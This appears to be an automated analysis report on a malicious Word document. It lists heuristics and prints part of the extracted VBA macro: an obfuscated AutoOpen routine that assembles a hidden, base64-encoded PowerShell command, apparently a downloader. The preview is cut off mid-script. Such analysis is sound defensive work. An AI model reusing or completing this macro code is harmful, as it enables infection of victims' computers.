MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Autoopen macro calls the UrDfsT function, which passes a command line to the Shell function with a vbHide window state. That command line is assembled at runtime from string fragments (a leading 'p' from Chr(vbKeyP), followed by concatenated pieces returned by helper functions such as dfsvp and pujLhY), yielding 'powersHeLL -WinDowsTyle hidden -e KAAnAHoAUAAnACsAJwB...': a PowerShell invocation with a hidden window and a base64-encoded script passed via -e (-EncodedCommand). The primary purpose appears to be downloading and executing a secondary payload.
Heuristics (6)
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17505 bytes |

SHA-256: 32e61150833b7d7628bee581672035eb6d1f6cac53a4a0e7470298f684fdacf2

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "kjVjjkJTmifY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UrDfsT()
On Error Resume Next
Select Case KAliGjdXm
Case 7109
SwdKcD = 6638
kYiof = CDbl(93502)
Case 40931
lBjdL = aYmQw
jVopb = 59108
End Select
Select Case KAlNiwSX
Case 22302
kqnBL = 72600
TrWFZQ = CDbl(32865)
Case 42735
XLFri = ktMAc
ipiJS = 87705
End Select
UrDfsT = LPvsAbiz + Shell(BlKuzYbMYdp + Chr(vbKeyP) + dfsvp + pujLhY + pZatTZEfNTj + EawqIcrplc + HJFGl + Tpwoo + bdwfJwv + NTKSf + jDwwhzIik, BjMUu + vbHide + HccNRRqO)
Select Case KAljlkFM
Case 50059
iRjCO = 5565
dYGSTj = CDbl(42767)
Case 11192
pKJdpC = wHWAmT
GsRSkT = 18390
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlmZQBQ
Case 54229
wKudqu = 90998
wabin = CDbl(90011)
Case 82979
EKlAZ = Qlmkf
jNomL = 11332
End Select
UrDfsT
Select Case KAlMGIct
Case 20773
VrIoWP = 91571
LqibR = CDbl(94354)
Case 88661
qGOXT = moThmi
vhspjf = 47498
End Select
End Sub
Attribute VB_Name = "wOQbLCzHjoL"
Function dfsvp()
On Error Resume Next
Select Case KAlzoGbwZ
Case 5257
wowTnW = 32643
YWlbJJ = CDbl(54997)
Case 44055
JUvNSj = brFOJ
QJzpTN = 30475
End Select
mACEBHCN = "owersHeL" + "L -Wi" + "nDowsTyle h" + "idden -e KAAnAH" + "oAUAAnACsAJwB"
Select Case KAlZWzOt
Case 25072
japMj = 83534
FGkdIY = CDbl(85254)
Case 92161
CbkFc = UpOHZk
wzYTSv = 32496
End Select
IqzuX = "yACcAKwAnA" + "G4AJwArACcA" + "cwBhAGQAJw" + "ArACcAYQBzACc" + "AKwAnA"
Select Case KAlCawdD
Case 81698
qFrRd = 12811
nIHfCG = CDbl(99888)
Case 95244
RCIKlF = GzfzAB
cZnPzJ = 29939
End Select
cNREpPGYqjm = "GQAIAA9ACcAKwA" + "nACAA" + "JgAoAG4AYgA4AG4" + "AbgBiADgAKwBu" + "AGIAJwArACc" + "AOABlA"
Select Case KAlHqzMQ
Case 23314
sKQEzi = 51017
fTkQlU = CDbl(96293)
Case 13339
mTfGPq = oMJvR
YocTE = 38982
End Select
lzUfwurkfBF = "G4AYgA4" + "ACsAbgAnA" + "CsAJw" + "BiADgAdwAnACsAJ" + "wAtAG8AYgBq" + "AGUAYw"
Select Case KAlvDKBdH
Case 90911
sinJj = 5077
whjdT = CDbl(31072)
Case 31245
VfdUuw = RPdXBi
dcHvl = 92597
End Select
hwXTvOAPVw = "BuAGIAOAArA" + "G4AYgA" + "4AHQAJwArA" + "CcAbgAnACsAJw" + "BiADgAJwArAC" + "cAKQAgAHIAJw"
dfsvp = mACEBHCN + IqzuX + cNREpPGYqjm + lzUfwurkfBF + hwXTvOAPVw
End Function
Function pujLhY()
On Error Resume Next
Select Case KAlVmhIzr
Case 91554
bATfSo = 43642
mASEMY = CDbl(60588)
Case 23045
rnDEV = iUCAs
MvEsfo = 56500
End Select
warWY = "ArACcAYQBuAG" + "QAJwAr" + "ACcAbwBtAD" + "sAegBQA"
Select Case KAlVQVGc
Case 41387
TrVzGV = 13362
EriFc = CDbl(77961)
Case 21759
odDaE = LhjCH
aRzbzc = 22031
End Select
QwWQUqsIT = "HIAWQAnACsAJwBZ" + "AFUAIAAnACsA" + "JwA9ACAAL" + "gAoAG" + "4AYgA4AG4"
Select Case KAlhDmaFn
Case 98708
wiBQK = 1696
cZvqEj = CDbl(77242)
Case 26524
Oahmu = Fzdji
rdUQPK = 70391
End Select
ViYTJzHYzcz = "AZQAnA" + "CsAJwBuA" + "GIAOAArA" + "G4AJwArACcAY" + "gAnACsAJ" + "wA4ACcAKwAnA" + "HcAJwArACc"
Select Case KAlArVZk
Case 39221
ElGvs = 79749
LiGMGq = CDbl(55831)
Case 3458
bSwlva = pVDNDX
HCaDB = 25786
End Select
jXjwXGIhE = "AbgAnACsAJwBi" + "ADgAKw" + "BuAGIAOAAt" + "AG8AYgBqAGUAYw" + "B0ACcAKwA" + "nAG4AJ"
pujLhY = warWY + QwWQUqsIT + ViYTJzHYzcz + jXjwXGIh
... (truncated)